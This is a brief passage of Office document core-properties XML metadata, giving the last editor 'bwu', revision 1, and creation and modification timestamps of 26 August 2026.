  <cp:lastModifiedBy>bwu</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-26T06:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-26T06:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>